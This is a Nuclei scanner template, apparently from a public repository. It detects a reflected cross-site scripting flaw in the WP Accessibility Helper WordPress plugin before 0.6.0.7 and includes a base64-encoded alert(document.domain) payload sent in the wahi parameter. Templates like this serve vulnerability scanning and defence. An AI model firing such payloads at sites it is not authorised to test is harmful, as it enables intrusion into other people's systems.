nuclei-templates/vulnerabilities/wordpress/accessibility-helper-xss.yaml

31 lines
863 B
YAML

id: accessibility-helper-xss
info:
name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
author: dhiyaneshDK
severity: medium
description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
reference: https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
tags: xss,wordpress,wp-plugin,wp
requests:
- method: GET
path:
- '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "var wah_target_src = '';alert(document.domain);//';"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200